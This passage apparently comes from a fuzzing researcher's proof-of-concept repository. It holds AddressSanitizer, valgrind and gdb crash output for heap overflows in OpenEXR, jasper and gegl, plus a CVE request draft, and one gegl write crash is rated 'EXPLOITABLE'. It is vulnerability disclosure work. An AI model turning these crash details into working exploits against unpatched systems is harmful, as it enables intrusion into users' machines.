f1 144 | Stack mid redzone: f2 145 | Stack right redzone: f3 146 | Stack partial redzone: f4 147 | Stack after return: f5 148 | Stack use after scope: f8 149 | Global redzone: f9 150 | Global init order: f6 151 | Poisoned by user: f7 152 | Container overflow: fc 153 | Array cookie: ac 154 | Intra object redzone: bb 155 | ASan internal: fe 156 | ==28==ABORTING 157 | 158 | 159 | ``` 160 | -------------------------------------------------------------------------------- /openexr.md: -------------------------------------------------------------------------------- 1 | 2 | OpenEXR 3 | ========================= 4 | 5 | # exrmaketiled 6 | 7 | ./exrmaketiled ./bug-testcase/185-openexr-heapoverflow /tmp/out 8 | ``` 9 | ================================================================= 10 | ==18567==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63100003c7fe at pc 0x7fc23e95a5ab bp 0x7ffe0428e7e0 sp 
0x7ffe0428e7d8 11 | READ of size 2 at 0x63100003c7fe thread T0 12 | #0 0x7fc23e95a5aa in hufDecode ../../openexr/OpenEXR/IlmImf/ImfHuf.cpp:898 13 | #1 0x7fc23e95a5aa in Imf_2_2::hufUncompress(char const*, int, unsigned short*, int) ../../openexr/OpenEXR/IlmImf/ImfHuf.cpp:1101 14 | #2 0x7fc23e971ca7 in Imf_2_2::PizCompressor::uncompress(char const*, int, Imath_2_2::Box >, char const*&) ../../openexr/OpenEXR/IlmImf/ImfPizCompressor.cpp:576 15 | #3 0x7fc23e974663 in Imf_2_2::PizCompressor::uncompress(char const*, int, int, char const*&) ../../openexr/OpenEXR/IlmImf/ImfPizCompressor.cpp:288 16 | #4 0x7fc23ea66bb7 in execute ../../openexr/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:544 17 | #5 0x7fc23d4081ea in IlmThread_2_2::ThreadPool::addTask(IlmThread_2_2::Task*) ../../openexr/IlmBase/IlmThread/IlmThreadPool.cpp:433 18 | #6 0x7fc23ea7c136 in Imf_2_2::ScanLineInputFile::readPixels(int, int) ../../openexr/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:1617 19 | #7 0x7fc23e904c7c in Imf_2_2::InputFile::readPixels(int, int) ../../openexr/OpenEXR/IlmImf/ImfInputFile.cpp:815 20 | #8 0x4236ed in makeTiled(char const*, char const*, int, Imf_2_2::LevelMode, Imf_2_2::LevelRoundingMode, Imf_2_2::Compression, int, int, std::set, std::allocator > const&, Extrapolation, Extrapolation, bool) ../../openexr/OpenEXR/exrmaketiled/makeTiled.cpp:572 21 | #9 0x405283 in main ../../openexr/OpenEXR/exrmaketiled/main.cpp:426 22 | #10 0x7fc23dd55f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 23 | #11 0x40692c (/data/xqx/tests/openexr-test/aflbuild/build-openexr/install/bin/exrmaketiled+0x40692c) 24 | 25 | 0x63100003c7fe is located 2 bytes to the left of 76800-byte region [0x63100003c800,0x63100004f400) 26 | allocated by thread T0 here: 27 | #0 0x7fc23f54a27f in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5527f) 28 | #1 0x7fc23e96adf0 in Imf_2_2::PizCompressor::PizCompressor(Imf_2_2::Header const&, unsigned long, unsigned long) 
../../openexr/OpenEXR/IlmImf/ImfPizCompressor.cpp:194 29 | 30 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../../openexr/OpenEXR/IlmImf/ImfHuf.cpp:898 hufDecode 31 | Shadow bytes around the buggy address: 32 | 0x0c627ffff8a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 33 | 0x0c627ffff8b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 34 | 0x0c627ffff8c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 35 | 0x0c627ffff8d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 36 | 0x0c627ffff8e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 37 | =>0x0c627ffff8f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 38 | 0x0c627ffff900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 | 0x0c627ffff910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 | 0x0c627ffff920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 | 0x0c627ffff930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 | 0x0c627ffff940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 | Shadow byte legend (one shadow byte represents 8 application bytes): 44 | Addressable: 00 45 | Partially addressable: 01 02 03 04 05 06 07 46 | Heap left redzone: fa 47 | Heap right redzone: fb 48 | Freed heap region: fd 49 | Stack left redzone: f1 50 | Stack mid redzone: f2 51 | Stack right redzone: f3 52 | Stack partial redzone: f4 53 | Stack after return: f5 54 | Stack use after scope: f8 55 | Global redzone: f9 56 | Global init order: f6 57 | Poisoned by user: f7 58 | Contiguous container OOB:fc 59 | ASan internal: fe 60 | ==18567==ABORTING 61 | ``` 62 | 63 | 64 | results as following by using valgrind 65 | 66 | ``` 67 | valgrind ./exrmaketiled ../../../../../bug-testcase/185-openexr-heapoverflow /tmp/out 68 | ==18448== Memcheck, a memory error detector 69 | ==18448== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 
70 | ==18448== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 71 | ==18448== Command: ./exrmaketiled ../../../../../bug-testcase/185-openexr-heapoverflow /tmp/out 72 | ==18448== 73 | ==18448== Invalid read of size 2 74 | ==18448== at 0x52FBDCB: hufDecode (ImfHuf.cpp:898) 75 | ==18448== by 0x52FBDCB: Imf_2_2::hufUncompress(char const*, int, unsigned short*, int) (ImfHuf.cpp:1101) 76 | ==18448== by 0x52FDB29: Imf_2_2::PizCompressor::uncompress(char const*, int, Imath_2_2::Box >, char const*&) (ImfPizCompressor.cpp:576) 77 | ==18448== by 0x52FDF26: Imf_2_2::PizCompressor::uncompress(char const*, int, int, char const*&) (ImfPizCompressor.cpp:288) 78 | ==18448== by 0x532099C: Imf_2_2::(anonymous namespace)::LineBufferTask::execute() (ImfScanLineInputFile.cpp:544) 79 | ==18448== by 0x649B708: IlmThread_2_2::ThreadPool::addTask(IlmThread_2_2::Task*) (IlmThreadPool.cpp:433) 80 | ==18448== by 0x5323DDA: Imf_2_2::ScanLineInputFile::readPixels(int, int) (ImfScanLineInputFile.cpp:1617) 81 | ==18448== by 0x52F1445: Imf_2_2::InputFile::readPixels(int, int) (ImfInputFile.cpp:815) 82 | ==18448== by 0x4094D3: makeTiled(char const*, char const*, int, Imf_2_2::LevelMode, Imf_2_2::LevelRoundingMode, Imf_2_2::Compression, int, int, std::set, std::allocator > const&, Extrapolation, Extrapolation, bool) (makeTiled.cpp:572) 83 | ==18448== by 0x403F02: main (main.cpp:426) 84 | ==18448== Address 0x6a3effe is 2 bytes before a block of size 76,800 alloc'd 85 | ==18448== at 0x4C2B800: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 86 | ==18448== by 0x52FD6E7: Imf_2_2::PizCompressor::PizCompressor(Imf_2_2::Header const&, unsigned long, unsigned long) (ImfPizCompressor.cpp:194) 87 | ==18448== by 0x52FCC3F: Imf_2_2::newCompressor(Imf_2_2::Compression, unsigned long, Imf_2_2::Header const&) (ImfCompressor.cpp:148) 88 | ==18448== by 0x5324910: Imf_2_2::ScanLineInputFile::initialize(Imf_2_2::Header const&) (ImfScanLineInputFile.cpp:1120) 89 
| ==18448== by 0x5324C3B: Imf_2_2::ScanLineInputFile::ScanLineInputFile(Imf_2_2::InputPartData*) (ImfScanLineInputFile.cpp:1166) 90 | ==18448== by 0x52F0324: Imf_2_2::InputFile::initialize() (ImfInputFile.cpp:592) 91 | ==18448== by 0x52F0867: Imf_2_2::InputFile::InputFile(Imf_2_2::InputPartData*) (ImfInputFile.cpp:477) 92 | ==18448== by 0x534542B: Imf_2_2::InputFile* Imf_2_2::MultiPartInputFile::getInputPart(int) (ImfMultiPartInputFile.cpp:185) 93 | ==18448== by 0x5345E7D: Imf_2_2::InputPart::InputPart(Imf_2_2::MultiPartInputFile&, int) (ImfInputPart.cpp:44) 94 | ==18448== by 0x409174: makeTiled(char const*, char const*, int, Imf_2_2::LevelMode, Imf_2_2::LevelRoundingMode, Imf_2_2::Compression, int, int, std::set, std::allocator > const&, Extrapolation, Extrapolation, bool) (makeTiled.cpp:535) 95 | ==18448== by 0x403F02: main (main.cpp:426) 96 | ==18448== 97 | Error reading pixel data from image file "../../../../../bug-testcase/185-openexr-heapoverflow". Error in Huffman-encoded data (invalid code). 
98 | ==18448== 99 | ==18448== HEAP SUMMARY: 100 | ==18448== in use at exit: 74,192 bytes in 31 blocks 101 | ==18448== total heap usage: 551 allocs, 520 frees, 3,823,049 bytes allocated 102 | ==18448== 103 | ==18448== LEAK SUMMARY: 104 | ==18448== definitely lost: 0 bytes in 0 blocks 105 | ==18448== indirectly lost: 0 bytes in 0 blocks 106 | ==18448== possibly lost: 0 bytes in 0 blocks 107 | ==18448== still reachable: 74,192 bytes in 31 blocks 108 | ==18448== suppressed: 0 bytes in 0 blocks 109 | ==18448== Rerun with --leak-check=full to see details of leaked memory 110 | ==18448== 111 | ==18448== For counts of detected and suppressed errors, rerun with: -v 112 | ==18448== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 113 | ``` 114 | 115 | -------------------------------------------------------------------------------- /cve-request/cve-request-1.txt: -------------------------------------------------------------------------------- 1 | Description: 2 | jasper is an open-source initiative to provide a free software-based reference 3 | implementation of the codec specified in the JPEG-2000 Part-1 standard. 4 | 5 | A crafted image causes a read overflow in the latest version 2.0.12. 6 | And this issue also exsits in the latest commit of github repo. 
7 | (https://github.com/mdadams/jasper) 8 | 9 | 10 | 11 | The complete ASan output: 12 | # ./install/bin/jasper -f $FILE -F /tmp/1.pnm -T pnm 13 | ================================================================= 14 | ==1220==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ee18 at pc 0x7fe8a1e0211b bp 0x7fffb4a6cb20 sp 0x7fffb4a6cb18 15 | READ of size 8 at 0x60300000ee18 thread T0 16 | #0 0x7fe8a1e0211a in jp2_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_dec.c:405 17 | #1 0x7fe8a1ddc192 in jas_image_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_image.c:444 18 | #2 0x40217a in main /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/appl/jasper.c:236 19 | #3 0x7fe8a1a00f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 20 | #4 0x401958 (/data/xqx/tests/libjasper-test/codes/abuild/install/bin/jasper+0x401958) 21 | 22 | 0x60300000ee18 is located 0 bytes to the right of 24-byte region [0x60300000ee00,0x60300000ee18) 23 | allocated by thread T0 here: 24 | #0 0x7fe8a2125862 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54862) 25 | #1 0x7fe8a1de5ec3 in jas_malloc /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_malloc.c:242 26 | #2 0x7fe8a1de6072 in jas_alloc2 /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_malloc.c:275 27 | #3 0x7fe8a1dfb896 in jp2_cdef_getdata /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_cod.c:468 28 | #4 0x7fe8a1dfaa46 in jp2_box_get /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_cod.c:303 29 | #5 0x7fe8a1e0015a in jp2_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_dec.c:159 30 | #6 0x7fe8a1ddc192 in jas_image_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_image.c:444 31 | #7 0x40217a in main 
/data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/appl/jasper.c:236 32 | #8 0x7fe8a1a00f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 33 | 34 | SUMMARY: AddressSanitizer: heap-buffer-overflow /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_dec.c:405 jp2_decode 35 | Shadow bytes around the buggy address: 36 | 0x0c067fff9d70: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 37 | 0x0c067fff9d80: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 38 | 0x0c067fff9d90: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 39 | 0x0c067fff9da0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 40 | 0x0c067fff9db0: fd fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa 41 | =>0x0c067fff9dc0: 00 00 00[fa]fa fa 00 00 00 00 fa fa 00 00 00 00 42 | 0x0c067fff9dd0: fa fa 00 00 00 02 fa fa 00 00 07 fa fa fa 00 00 43 | 0x0c067fff9de0: 05 fa fa fa 00 00 07 fa fa fa 00 00 00 06 fa fa 44 | 0x0c067fff9df0: 00 00 00 06 fa fa 00 00 00 06 fa fa 00 00 06 fa 45 | 0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 46 | 0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 47 | Shadow byte legend (one shadow byte represents 8 application bytes): 48 | Addressable: 00 49 | Partially addressable: 01 02 03 04 05 06 07 50 | Heap left redzone: fa 51 | Heap right redzone: fb 52 | Freed heap region: fd 53 | Stack left redzone: f1 54 | Stack mid redzone: f2 55 | Stack right redzone: f3 56 | Stack partial redzone: f4 57 | Stack after return: f5 58 | Stack use after scope: f8 59 | Global redzone: f9 60 | Global init order: f6 61 | Poisoned by user: f7 62 | Contiguous container OOB:fc 63 | ASan internal: fe 64 | ==1220==ABORTING 65 | 66 | 67 | 68 | Affected version: 69 | the Latest version 2.0.12, and also in the latest commit 1cce277. 70 | 71 | Fixed version: 72 | N/A 73 | 74 | Commit fix: 75 | N/A 76 | 77 | Credit: 78 | the bug is found by Qixue Xiao and Kang Li. 
79 | 80 | 81 | CVE: 82 | N/A 83 | 84 | Reproducer: 85 | https://github.com/xiaoqx/pocs/blob/master/026-jasper-jps_decode-heapoverflow 86 | 87 | Timeline: 88 | 2017-06-14: bug discovered and reported upstream 89 | 90 | 91 | Note: 92 | This bug was found with American Fuzzy Lop. 93 | 94 | 95 | -- 96 | xiaoqixue_1@163.com 97 | 98 | 99 | 100 | 101 | 102 | ----------------------------------------------------------------------------------------- 103 | 104 | bug details : 105 | 106 | ./install/bin/jasper -f /tmp/026-jasper-jps_decode-heapoverflow -F /tmp/1.pnm -T pnm 107 | ================================================================= 108 | ==1220==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ee18 at pc 0x7fe8a1e0211b bp 0x7fffb4a6cb20 sp 0x7fffb4a6cb18 109 | READ of size 8 at 0x60300000ee18 thread T0 110 | #0 0x7fe8a1e0211a in jp2_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_dec.c:405 111 | #1 0x7fe8a1ddc192 in jas_image_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_image.c:444 112 | #2 0x40217a in main /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/appl/jasper.c:236 113 | #3 0x7fe8a1a00f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 114 | #4 0x401958 (/data/xqx/tests/libjasper-test/codes/abuild/install/bin/jasper+0x401958) 115 | 116 | 0x60300000ee18 is located 0 bytes to the right of 24-byte region [0x60300000ee00,0x60300000ee18) 117 | allocated by thread T0 here: 118 | #0 0x7fe8a2125862 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54862) 119 | #1 0x7fe8a1de5ec3 in jas_malloc /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_malloc.c:242 120 | #2 0x7fe8a1de6072 in jas_alloc2 /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_malloc.c:275 121 | #3 0x7fe8a1dfb896 in jp2_cdef_getdata /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_cod.c:468 122 | #4 
0x7fe8a1dfaa46 in jp2_box_get /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_cod.c:303 123 | #5 0x7fe8a1e0015a in jp2_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_dec.c:159 124 | #6 0x7fe8a1ddc192 in jas_image_decode /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/base/jas_image.c:444 125 | #7 0x40217a in main /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/appl/jasper.c:236 126 | #8 0x7fe8a1a00f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 127 | 128 | SUMMARY: AddressSanitizer: heap-buffer-overflow /data/xqx/tests/libjasper-test/codes/jasper-2.0.12/src/libjasper/jp2/jp2_dec.c:405 jp2_decode 129 | Shadow bytes around the buggy address: 130 | 0x0c067fff9d70: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 131 | 0x0c067fff9d80: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 132 | 0x0c067fff9d90: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 133 | 0x0c067fff9da0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 134 | 0x0c067fff9db0: fd fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa 135 | =>0x0c067fff9dc0: 00 00 00[fa]fa fa 00 00 00 00 fa fa 00 00 00 00 136 | 0x0c067fff9dd0: fa fa 00 00 00 02 fa fa 00 00 07 fa fa fa 00 00 137 | 0x0c067fff9de0: 05 fa fa fa 00 00 07 fa fa fa 00 00 00 06 fa fa 138 | 0x0c067fff9df0: 00 00 00 06 fa fa 00 00 00 06 fa fa 00 00 06 fa 139 | 0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 140 | 0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 141 | Shadow byte legend (one shadow byte represents 8 application bytes): 142 | Addressable: 00 143 | Partially addressable: 01 02 03 04 05 06 07 144 | Heap left redzone: fa 145 | Heap right redzone: fb 146 | Freed heap region: fd 147 | Stack left redzone: f1 148 | Stack mid redzone: f2 149 | Stack right redzone: f3 150 | Stack partial redzone: f4 151 | Stack after return: f5 152 | Stack use after scope: f8 153 | Global redzone: f9 154 | Global init order: f6 155 | 
Poisoned by user: f7 156 | Contiguous container OOB:fc 157 | ASan internal: fe 158 | ==1220==ABORTING 159 | 160 | 161 | ============================================== 162 | 163 | jasper --input $FILE --output /tmp/1.ppm --output-format pnm 164 | ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ee18 at pc 0x7f962fff7417 bp 0x7ffc795e5c40 sp 0x7ffc795e5c38 165 | READ of size 8 at 0x60300000ee18 thread T0 166 | #0 0x7f962fff7416 in jp2_decode /data/xqx/tests/libjasper-test/jasper/src/libjasper/jp2/jp2_dec.c:405 167 | #1 0x7f962ff96880 in jas_image_decode /data/xqx/tests/libjasper-test/jasper/src/libjasper/base/jas_image.c:442 168 | #2 0x4020fb in main /data/xqx/tests/libjasper-test/jasper/src/appl/jasper.c:236 169 | #3 0x7f962fb63f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 170 | #4 0x4035ec (/data/xqx/tests/libjasper-test/aflbuild/install/bin/jasper+0x4035ec) 171 | 172 | 0x60300000ee18 is located 0 bytes to the right of 24-byte region [0x60300000ee00,0x60300000ee18) 173 | allocated by thread T0 here: 174 | #0 0x7f96303a9862 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54862) 175 | #1 0x7f962ffa55d2 in jas_malloc /data/xqx/tests/libjasper-test/jasper/src/libjasper/base/jas_malloc.c:241 176 | 177 | SUMMARY: AddressSanitizer: heap-buffer-overflow /data/xqx/tests/libjasper-test/jasper/src/libjasper/jp2/jp2_dec.c:405 jp2_decode 178 | Shadow bytes around the buggy address: 179 | 0x0c067fff9d70: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 180 | 0x0c067fff9d80: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 181 | 0x0c067fff9d90: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 182 | 0x0c067fff9da0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 183 | 0x0c067fff9db0: fd fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa 184 | =>0x0c067fff9dc0: 00 00 00[fa]fa fa 00 00 00 00 fa fa 00 00 00 00 185 | 0x0c067fff9dd0: fa fa 00 00 00 02 fa fa 00 00 07 fa fa fa 00 00 186 | 0x0c067fff9de0: 05 fa fa fa 00 00 07 fa fa fa 00 00 
00 06 fa fa 187 | 0x0c067fff9df0: 00 00 00 06 fa fa 00 00 00 06 fa fa 00 00 06 fa 188 | 0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 189 | 0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 190 | Shadow byte legend (one shadow byte represents 8 application bytes): 191 | Addressable: 00 192 | Partially addressable: 01 02 03 04 05 06 07 193 | Heap left redzone: fa 194 | Heap right redzone: fb 195 | Freed heap region: fd 196 | Stack left redzone: f1 197 | Stack mid redzone: f2 198 | Stack right redzone: f3 199 | Stack partial redzone: f4 200 | Stack after return: f5 201 | Stack use after scope: f8 202 | Global redzone: f9 203 | Global init order: f6 204 | Poisoned by user: f7 205 | Contiguous container OOB:fc 206 | ASan internal: fe 207 | -------------------------------------------------------------------------------- /gegl/readme.md: -------------------------------------------------------------------------------- 1 | gegl poc 2 | ================== 3 | 4 | ## 1. gegl-outbound-write-1 5 | 6 | ``` 7 | (gdb) run ./gegl-outbound-write-1 8 | The program being debugged has been started already. 9 | Start it from the beginning? (y or n) y 10 | Starting program: /src/aflbuild/installed/bin/gegl ./gegl-outbound-write-1 11 | [Thread debugging using libthread_db enabled] 12 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 13 | 14 | (gegl:303): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 15 | 16 | (gegl:303): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 17 | 18 | ** (gegl:303): WARNING **: No display handler operation found for gegl:display 19 | [New Thread 0x7fffef432700 (LWP 304)] 20 | 21 | Thread 1 "gegl" received signal SIGSEGV, Segmentation fault. 22 | __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:37 23 | 37 ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory. 
24 | (gdb) exploitable 25 | Description: Access violation on destination operand 26 | Short description: DestAv (8/22) 27 | Hash: d7482cdb03f2cb0b586cd5cf74b1cb43.f4d790321ded280ed3837c295823fc52 28 | Exploitability Classification: EXPLOITABLE 29 | Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. 30 | Other tags: AccessViolation (21/22) 31 | (gdb) bt 32 | #0 __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:37 33 | #1 0x00007ffff7a8d051 in memcpy (__len=384, __src=0x7ffff7f441a0, __dest=) at /usr/include/x86_64-linux-gnu/bits/string3.h:53 34 | #2 gegl_buffer_iterate_read_simple (buffer=buffer@entry=0x7491a0, roi=roi@entry=0x7fffffffd140, buf=buf@entry=0x7ffde0cea010 "", buf_stride=buf_stride@entry=-2118217885, format=format@entry=0x63cb40, 35 | level=level@entry=0) at ../../../gegl/gegl/buffer/gegl-buffer-access.c:1212 36 | #3 0x00007ffff7a9d115 in gegl_buffer_iterate_read_dispatch (buffer=0x7491a0, roi=, buf=0x7ffde0cea010 "", rowstride=-2118217885, format=0x63cb40, repeat_mode=GEGL_ABYSS_NONE, level=0) 37 | at ../../../gegl/gegl/buffer/gegl-buffer-access.c:1832 38 | #4 0x00007ffff7aa6f41 in _gegl_buffer_get_unlocked (buffer=0x7491a0, scale=, rect=0x7fffffffd370, format=, dest_buf=0x7ffde0cea010, rowstride=0, flags=GEGL_ABYSS_NONE) 39 | at ../../../gegl/gegl/buffer/gegl-buffer-access.c:2055 40 | #5 0x00007fffef8440ba in process (operation=, output=0x7491a0, result=, level=) at ../../../gegl/operations/external/ppm-load.c:320 41 | #6 0x00007ffff7b41bfe in gegl_operation_source_process (operation=0x6cc260, context=, output_prop=, result=0x740450, level=0) 42 | at ../../../gegl/gegl/operation/gegl-operation-source.c:182 43 | #7 0x00007ffff7b6b0ae in gegl_graph_process (path=0x73b470, level=level@entry=0) at 
../../../gegl/gegl/process/gegl-graph-traversal.c:469 44 | #8 0x00007ffff7b67fe8 in gegl_eval_manager_apply (self=0x73fb80, roi=roi@entry=0x748cc0, level=level@entry=0) at ../../../gegl/gegl/process/gegl-eval-manager.c:128 45 | #9 0x00007ffff7b51f7e in gegl_node_apply_roi (level=0, roi=0x748cc0, self=0x696050) at ../../../gegl/gegl/graph/gegl-node.c:1081 46 | #10 gegl_node_blit (self=0x696050, scale=1, roi=roi@entry=0x748cc0, format=format@entry=0x63cb40, destination_buf=destination_buf@entry=0x7fffe7c8e010, rowstride=-2118217885, rowstride@entry=0, 47 | flags=flags@entry=GEGL_BLIT_DEFAULT) at ../../../gegl/gegl/graph/gegl-node.c:1161 48 | #11 0x00007ffff7b6f928 in render_rectangle (processor=0x734c60) at ../../../gegl/gegl/process/gegl-processor.c:518 49 | #12 gegl_processor_render (progress=0x0, rectangle=0x734c88, processor=0x734c60) at ../../../gegl/gegl/process/gegl-processor.c:662 50 | #13 gegl_processor_work (processor=processor@entry=0x734c60, progress=progress@entry=0x0) at ../../../gegl/gegl/process/gegl-processor.c:796 51 | #14 0x00007ffff7b50a5a in gegl_node_process (self=) at ../../../gegl/gegl/graph/gegl-node.c:1827 52 | #15 0x00000000004039ea in main (argc=, argv=) at ../../gegl/bin/gegl.c:255 53 | ``` 54 | 55 | ## 2. gegl-dos-1 56 | 57 | ``` 58 | $ gdb --args gegl $POC 59 | [Thread debugging using libthread_db enabled] 60 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 
61 | 62 | (gegl:387): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 63 | 64 | (gegl:387): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 65 | 66 | ** (gegl:387): WARNING **: No display handler operation found for gegl:display 67 | [New Thread 0x7fffef432700 (LWP 391)] 68 | 69 | (gegl:387): GLib-ERROR **: /build/glib2.0-prJhLS/glib2.0-2.48.2/./glib/gmem.c:100: failed to allocate 18446744071565764224 bytes 70 | 71 | Thread 1 "gegl" received signal SIGTRAP, Trace/breakpoint trap. 72 | 0x00007ffff74dba5b in g_logv () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 73 | (gdb) bt 74 | #0 0x00007ffff74dba5b in g_logv () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 75 | #1 0x00007ffff74dbbcf in g_log () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 76 | #2 0x00007ffff74da744 in g_malloc () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 77 | #3 0x00007ffff7b6f8a2 in render_rectangle (processor=0x735460) at ../../../gegl/gegl/process/gegl-processor.c:512 78 | #4 gegl_processor_render (progress=0x0, rectangle=0x735488, processor=0x735460) at ../../../gegl/gegl/process/gegl-processor.c:662 79 | #5 gegl_processor_work (processor=processor@entry=0x735460, progress=progress@entry=0x0) at ../../../gegl/gegl/process/gegl-processor.c:796 80 | #6 0x00007ffff7b50a5a in gegl_node_process (self=) at ../../../gegl/gegl/graph/gegl-node.c:1827 81 | #7 0x00000000004039ea in main (argc=, argv=) at ../../gegl/bin/gegl.c:255 82 | ``` 83 | 84 | ## 3. gegl-dos-2 85 | 86 | ``` 87 | $ gdb --args gegl $POC 88 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 
89 | 90 | (gegl:394): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 91 | 92 | (gegl:394): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 93 | 94 | ** (gegl:394): WARNING **: No display handler operation found for gegl:display 95 | [New Thread 0x7fffef432700 (LWP 398)] 96 | 97 | (gegl:394): GLib-ERROR **: /build/glib2.0-prJhLS/glib2.0-2.48.2/./glib/gmem.c:100: failed to allocate 1333333333323288 bytes 98 | 99 | Thread 1 "gegl" received signal SIGTRAP, Trace/breakpoint trap. 100 | 0x00007ffff74dba5b in g_logv () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 101 | (gdb) bt 102 | #0 0x00007ffff74dba5b in g_logv () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 103 | #1 0x00007ffff74dbbcf in g_log () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 104 | #2 0x00007ffff74da744 in g_malloc () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 105 | #3 0x00007fffef843f20 in process (operation=, output=0x7491a0, result=, 106 | level=) at ../../../gegl/operations/external/ppm-load.c:293 107 | #4 0x00007ffff7b41bfe in gegl_operation_source_process 